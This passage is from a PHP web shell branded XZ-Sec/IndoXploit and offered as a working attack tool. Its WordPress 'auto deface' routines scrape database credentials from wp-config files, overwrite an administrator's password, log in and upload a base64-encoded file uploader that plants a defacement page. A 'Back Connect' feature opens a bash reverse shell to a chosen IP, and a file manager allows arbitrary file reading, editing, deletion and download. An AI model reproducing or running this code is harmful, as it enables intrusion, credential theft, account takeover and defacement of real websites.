1226. $cek = cek("$url/~$user/$file");
1227. if(preg_match("/hacked/i", $cek)) {
1228. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1229. }
1230. }
1231. } else {
1232. echo "<center><form method='post'>
1233. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1234. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1235. Domain: <br>
1236. <textarea style='width: 450px; height: 250px;' name='url'>";
1237. reverse($_SERVER['HTTP_HOST']);
1238. echo "</textarea><br>
1239. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1240. </form><br>
1241. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1242. }
1243. } elseif($_GET['do'] == 'adminer') {
1244. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1245. function adminer($url, $isi) {
1246. $fp = fopen($isi, "w");
1247. $ch = curl_init();
1248. curl_setopt($ch, CURLOPT_URL, $url);
1249. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1250. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1251. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1252. curl_setopt($ch, CURLOPT_FILE, $fp);
1253. return curl_exec($ch);
1254. curl_close($ch);
1255. fclose($fp);
1256. ob_flush();
1257. flush();
1258. }
1259. if(file_exists('adminer.php')) {
1260. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1261. } else {
1262. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1263. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1264. } else {
1265. echo "<center><font color=red>gagal buat file adminer</font></center>";
1266. }
1267. }
1268. } elseif($_GET['do'] == 'auto_dwp') {
1269. if($_POST['auto_deface_wp']) {
1270. function anucurl($sites) {
1271. $ch = curl_init($sites);
1272. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1273. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1274. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1275. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1276. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1277. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1278. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1279. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1280. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1281. $data = curl_exec($ch);
1282. curl_close($ch);
1283. return $data;
1284. }
1285. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1286. $post = array(
1287. "log" => "$userr",
1288. "pwd" => "$pass",
1289. "rememberme" => "forever",
1290. "wp-submit" => "$wp_submit",
1291. "redirect_to" => "$web",
1292. "testcookie" => "1",
1293. );
1294. $ch = curl_init($cek);
1295. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1296. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1297. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1298. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1299. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1300. curl_setopt($ch, CURLOPT_POST, 1);
1301. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1302. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1303. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1304. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1305. $data = curl_exec($ch);
1306. curl_close($ch);
1307. return $data;
1308. }
1309. $scan = $_POST['link_config'];
1310. $link_config = scandir($scan);
1311. $script = htmlspecialchars($_POST['script']);
1312. $user = "noname110";
1313. $pass = "noname110";
1314. $passx = md5($pass);
1315. foreach($link_config as $dir_config) {
1316. if(!is_file("$scan/$dir_config")) continue;
1317. $config = file_get_contents("$scan/$dir_config");
1318. if(preg_match("/WordPress/", $config)) {
1319. $dbhost = ambilkata($config,"DB_HOST', '","'");
1320. $dbuser = ambilkata($config,"DB_USER', '","'");
1321. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1322. $dbname = ambilkata($config,"DB_NAME', '","'");
1323. $dbprefix = ambilkata($config,"table_prefix = '","'");
1324. $prefix = $dbprefix."users";
1325. $option = $dbprefix."options";
1326. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1327. $db = mysql_select_db($dbname);
1328. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1329. $result = mysql_fetch_array($q);
1330. $id = $result[ID];
1331. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1332. $result2 = mysql_fetch_array($q2);
1333. $target = $result2[option_value];
1334. if($target == '') {
1335. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1336. } else {
1337. echo "[+] $target <br>";
1338. }
1339. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1340. if(!$conn OR !$db OR !$update) {
1341. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1342. mysql_close($conn);
1343. } else {
1344. $site = "$target/wp-login.php";
1345. $site2 = "$target/wp-admin/theme-install.php?upload";
1346. $b1 = anucurl($site2);
1347. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1348. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1349. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1350. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1351. $www = "m.php";
1352. $fp5 = fopen($www,"w");
1353. fputs($fp5,$upload3);
1354. $post2 = array(
1355. "_wpnonce" => "$anu2",
1356. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1357. "themezip" => "@$www",
1358. "install-theme-submit" => "Install Now",
1359. );
1360. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1361. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1362. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1363. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1364. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1365. curl_setopt($ch, CURLOPT_POST, 1);
1366. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1367. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1368. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1369. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1370. $data3 = curl_exec($ch);
1371. curl_close($ch);
1372. $y = date("Y");
1373. $m = date("m");
1374. $namafile = "id.php";
1375. $fpi = fopen($namafile,"w");
1376. fputs($fpi,$script);
1377. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1378. curl_setopt($ch6, CURLOPT_POST, true);
1379. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1380. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1381. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1382. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1383. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1384. $postResult = curl_exec($ch6);
1385. curl_close($ch6);
1386. $as = "$target/k.php";
1387. $bs = anucurl($as);
1388. if(preg_match("#$script#is", $bs)) {
1389. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1390. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1391. } else {
1392. echo "[-] <font color='red'>gagal mepes...</font><br>";
1393. echo "[!!] coba aja manual: <br>";
1394. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1395. echo "[+] username: <font color=lime>$user</font><br>";
1396. echo "[+] password: <font color=lime>$pass</font><br><br>";
1397. }
1398. mysql_close($conn);
1399. }
1400. }
1401. }
1402. } else {
1403. echo "<center><h1>WordPress Auto Deface</h1>
1404. <form method='post'>
1405. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1406. <input type='text' name='script' height='10' size='50' placeholder='Hacked by XZ-Sec' required><br>
1407. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1408. </form>
1409. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1410. </center>";
1411. }
1412. } elseif($_GET['do'] == 'auto_dwp2') {
1413. if($_POST['auto_deface_wp']) {
1414. function anucurl($sites) {
1415. $ch = curl_init($sites);
1416. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1417. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1418. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1419. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1420. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1421. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1422. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1423. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1424. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1425. $data = curl_exec($ch);
1426. curl_close($ch);
1427. return $data;
1428. }
1429. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1430. $post = array(
1431. "log" => "$userr",
1432. "pwd" => "$pass",
1433. "rememberme" => "forever",
1434. "wp-submit" => "$wp_submit",
1435. "redirect_to" => "$web",
1436. "testcookie" => "1",
1437. );
1438. $ch = curl_init($cek);
1439. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1440. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1441. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1442. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1443. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1444. curl_setopt($ch, CURLOPT_POST, 1);
1445. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1446. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1447. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1448. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1449. $data = curl_exec($ch);
1450. curl_close($ch);
1451. return $data;
1452. }
1453. $link = explode("\r\n", $_POST['link']);
1454. $script = htmlspecialchars($_POST['script']);
1455. $user = "noname110";
1456. $pass = "noname110";
1457. $passx = md5($pass);
1458. foreach($link as $dir_config) {
1459. $config = anucurl($dir_config);
1460. $dbhost = ambilkata($config,"DB_HOST', '","'");
1461. $dbuser = ambilkata($config,"DB_USER', '","'");
1462. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1463. $dbname = ambilkata($config,"DB_NAME', '","'");
1464. $dbprefix = ambilkata($config,"table_prefix = '","'");
1465. $prefix = $dbprefix."users";
1466. $option = $dbprefix."options";
1467. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1468. $db = mysql_select_db($dbname);
1469. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1470. $result = mysql_fetch_array($q);
1471. $id = $result[ID];
1472. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1473. $result2 = mysql_fetch_array($q2);
1474. $target = $result2[option_value];
1475. if($target == '') {
1476. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1477. } else {
1478. echo "[+] $target <br>";
1479. }
1480. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1481. if(!$conn OR !$db OR !$update) {
1482. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1483. mysql_close($conn);
1484. } else {
1485. $site = "$target/wp-login.php";
1486. $site2 = "$target/wp-admin/theme-install.php?upload";
1487. $b1 = anucurl($site2);
1488. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1489. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1490. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1491. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1492. $www = "m.php";
1493. $fp5 = fopen($www,"w");
1494. fputs($fp5,$upload3);
1495. $post2 = array(
1496. "_wpnonce" => "$anu2",
1497. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1498. "themezip" => "@$www",
1499. "install-theme-submit" => "Install Now",
1500. );
1501. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1502. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1503. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1504. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1505. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1506. curl_setopt($ch, CURLOPT_POST, 1);
1507. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1508. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1509. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1510. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1511. $data3 = curl_exec($ch);
1512. curl_close($ch);
1513. $y = date("Y");
1514. $m = date("m");
1515. $namafile = "id.php";
1516. $fpi = fopen($namafile,"w");
1517. fputs($fpi,$script);
1518. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1519. curl_setopt($ch6, CURLOPT_POST, true);
1520. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1521. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1522. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1523. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1524. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1525. $postResult = curl_exec($ch6);
1526. curl_close($ch6);
1527. $as = "$target/k.php";
1528. $bs = anucurl($as);
1529. if(preg_match("#$script#is", $bs)) {
1530. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1531. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1532. } else {
1533. echo "[-] <font color='red'>gagal mepes...</font><br>";
1534. echo "[!!] coba aja manual: <br>";
1535. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1536. echo "[+] username: <font color=lime>$user</font><br>";
1537. echo "[+] password: <font color=lime>$pass</font><br><br>";
1538. }
1539. mysql_close($conn);
1540. }
1541. }
1542. } else {
1543. echo "<center><h1>WordPress Auto Deface V.2</h1>
1544. <form method='post'>
1545. Link Config: <br>
1546. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1547. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1548. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1549. </form></center>";
1550. }
1551. } elseif($_GET['do'] == 'network') {
1552. echo "<center><form method='post'>
1553. Back Connect: <br>
1554. <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'><br>
1555. <input type='text' placeholder='port' name='port_bc' value='6969'><br>
1556. <input type='submit' name='sub_bc' value='Reverse' style='width: 210px;'>
1557. </form>";
1558. if(isset($_POST['sub_bc'])) {
1559. $ip = $_POST['ip_bc'];
1560. $port = $_POST['port_bc'];
1561. exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
1562. }
1563. echo "</center>";
1564. } elseif($_GET['act'] == 'newfile') {
1565. if($_POST['new_save_file']) {
1566. $newfile = htmlspecialchars($_POST['newfile']);
1567. $fopen = fopen($newfile, "a+");
1568. if($fopen) {
1569. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1570. } else {
1571. $act = "<font color=red>permission denied</font>";
1572. }
1573. }
1574. echo $act;
1575. echo "<form method='post'>
1576. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
1577. <input type='submit' name='new_save_file' value='Submit'>
1578. </form>";
1579. } elseif($_GET['act'] == 'newfolder') {
1580. if($_POST['new_save_folder']) {
1581. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1582. if(!mkdir($new_folder)) {
1583. $act = "<font color=red>permission denied</font>";
1584. } else {
1585. $act = "<script>window.location='?dir=".$dir."';</script>";
1586. }
1587. }
1588. echo $act;
1589. echo "<form method='post'>
1590. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1591. <input type='submit' name='new_save_folder' value='Submit'>
1592. </form>";
1593. } elseif($_GET['act'] == 'rename_dir') {
1594. if($_POST['dir_rename']) {
1595. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1596. if($dir_rename) {
1597. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1598. } else {
1599. $act = "<font color=red>permission denied</font>";
1600. }
1601. echo "".$act."<br>";
1602. }
1603. echo "<form method='post'>
1604. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1605. <input type='submit' name='dir_rename' value='rename'>
1606. </form>";
1607. } elseif($_GET['act'] == 'delete_dir') {
1608. $delete_dir = rmdir($dir);
1609. if($delete_dir) {
1610. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1611. } else {
1612. $act = "<font color=red>could not remove ".basename($dir)."</font>";
1613. }
1614. echo $act;
1615. } elseif($_GET['act'] == 'view') {
1616. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1617. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1618. } elseif($_GET['act'] == 'edit') {
1619. if($_POST['save']) {
1620. $save = file_put_contents($_GET['file'], $_POST['src']);
1621. if($save) {
1622. $act = "<font color=lime>Saved!</font>";
1623. } else {
1624. $act = "<font color=red>permission denied</font>";
1625. }
1626. echo "".$act."<br>";
1627. }
1628. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1629. echo "<form method='post'>
1630. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1631. <input type='submit' value='Save' name='save' style='width: 500px;'>
1632. </form>";
1633. } elseif($_GET['act'] == 'rename') {
1634. if($_POST['do_rename']) {
1635. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1636. if($rename) {
1637. $act = "<script>window.location='?dir=".$dir."';</script>";
1638. } else {
1639. $act = "<font color=red>permission denied</font>";
1640. }
1641. echo "".$act."<br>";
1642. }
1643. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1644. echo "<form method='post'>
1645. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1646. <input type='submit' name='do_rename' value='rename'>
1647. </form>";
1648. } elseif($_GET['act'] == 'delete') {
1649. $delete = unlink($_GET['file']);
1650. if($delete) {
1651. $act = "<script>window.location='?dir=".$dir."';</script>";
1652. } else {
1653. $act = "<font color=red>permission denied</font>";
1654. }
1655. echo $act;
1656. } elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
1657. @ob_clean();
1658. $file = $_GET['file'];
1659. header('Content-Description: File Transfer');
1660. header('Content-Type: application/octet-stream');
1661. header('Content-Disposition: attachment; filename="'.basename($file).'"');
1662. header('Expires: 0');
1663. header('Cache-Control: must-revalidate');
1664. header('Pragma: public');
1665. header('Content-Length: ' . filesize($file));
1666. readfile($file);
1667. exit;
1668. } else {
1669. if(is_dir($dir) == true) {
1670. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1671. <tr>
1672. <th class="th_home"><center>Name</center></th>
1673. <th class="th_home"><center>Type</center></th>
1674. <th class="th_home"><center>Size</center></th>
1675. <th class="th_home"><center>Last Modified</center></th>
1676. <th class="th_home"><center>Permission</center></th>
1677. <th class="th_home"><center>Action</center></th>
1678. </tr>';
1679. $scandir = scandir($dir);
1680. foreach($scandir as $dirx) {
1681. $dtype = filetype("$dir/$dirx");
1682. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1683. if(!is_dir("$dir/$dirx")) continue;
1684. if($dirx === '..') {
1685. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1686. } elseif($dirx === '.') {
1687. $href = "<a href='?dir=$dir'>$dirx</a>";
1688. } else {
1689. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
1690. }
1691. if($dirx === '.' || $dirx === '..') {
1692. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
1693. } else {
1694. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
1695. }
1696. echo "<tr>";
1697. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
1698. echo "<td class='td_home'><center>$dtype</center></td>";
1699. echo "<td class='td_home'><center>-</center></th>";
1700. echo "<td class='td_home'><center>$dtime</center></td>";
1701. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
1702. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
1703. }
1704. echo "</tr>";
1705. foreach($scandir as $file) {
1706. $ftype = filetype("$dir/$file");
1707. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1708. $size = filesize("$dir/$file")/1024;
1709. $size = round($size,3);
1710. if($size > 1024) {
1711. $size = round($size/1024,2). 'MB';
1712. } else {
1713. $size = $size. 'KB';
1714. }
1715. if(!is_file("$dir/$file")) continue;
1716. echo "<tr>";
1717. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
1718. echo "<td class='td_home'><center>$ftype</center></td>";
1719. echo "<td class='td_home'><center>$size</center></td>";
1720. echo "<td class='td_home'><center>$ftime</center></td>";
1721. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
1722. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
1723. }
1724. echo "</tr></table><hr>";
1725. } else {
1726. echo "<font color=red>can't open directory</font>";
1727. }
1728. echo "<center>Copyright &copy; ".date("Y")." - <a href='https://api.whatsapp.com/send?phone=+6285708309022&text=+Hallo' target='_blank'><font color=lime>XZ-Sec</font></a></center>";
1729. }
1730. ?>
1731. </html>